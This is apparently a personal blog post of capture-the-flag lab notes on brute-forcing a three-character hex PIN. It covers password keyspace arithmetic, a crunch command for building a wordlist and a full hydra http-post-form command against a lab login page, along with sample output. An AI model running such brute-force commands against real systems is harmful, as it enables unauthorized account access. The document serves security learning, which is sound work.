---
title: Post 53 - Open Sesame
date: 2023-12-03
tags:
    - brute-forcing
    - crunch
    - hydra
---
## Task 9, Day 03, <code>Brute-forcing</code> Hydra is Coming to Town

Counting PIN codes - how many positions for 0-9; 10^x where x= number of digits. Four digits, 10^4 = 10,000 possibilities.

Counting passwords - how many positions for what characters; four character password with 0-9a-zA-Z, 10+26+26 = 62 characters in four possible places, 62^4 = 14,776,336 possibilities. Symbols add another 30 characters, 92^4 = 71,639,296.

### How long does it take to brute force?
If trying a password takes 0.001 seconds it would take up to 4 hours for the 14 million combinations. Because of averages where password might be closer to beginning than end, it is safe to assume it would take around 2 hours to crack the password. Increase time taken by adding complexity, include symbols and add to length.

### Breaking in
First determine how long the password is. In this case 3 characters. Then figure out what characters are included. In this case, the keypad has hex characters, 0-F. Can use Crunch tool in terminal to generate options.<br>
<code>crunch 3 3 0123456789ABCDEF -o 3digits.txt</code>
- First number is minimum length of password
- Second number is maximum length of password
- 0-F is character set to use
- <code>-o filename.txt</code> saves the output to the specified file.

Can try out codes manually or with a tool like Hydra. In this case, view source of page to see method it uses to login, what address/file is used, and name of variable submitted as the code. This info is needed to set the arguments in Hydra.<br>
<code>hydra -l '' -P filename.txt -f -v TARGET_ADDRESS http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000</code>
- <code>-l ''</code> indicates login name is blank since it is only a password
- <code>-P filename.txt</code> specifies password file to use
- <code>-f</code> stops Hydra when password is found
- <code>-v</code> verbose output (as usual)
- Target IP address
- <code>http-post-form</code> specifies method to use
- <code>/login.php</code> page where pin is entered
- <code>pin=^PASS^</code> replaces <code>^PASS^</code> with values from file
- <code>Access denied</code> wrong guesses give access denied page
- <code>-s 8000</code> port number on target

Failure then success looks similar to:<br>
```
[VERBOSE] Page redirected to http[s]://MACHINE_IP:8000/error.php
[...]
[VERBOSE] Page redirected to http[s]://MACHINE_IP:8000/error.php
[8000][http-post-form] host: MACHINE_IP   password: [redacted]
[STATUS] attack finished for MACHINE_IP (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-10-19 17:39:24
```

### The Task
Brute force the code to unlock the door. 

Door unlocked, flag retrieved, fun had.

#### Recommended room
Password Attacks - need to try and remember it.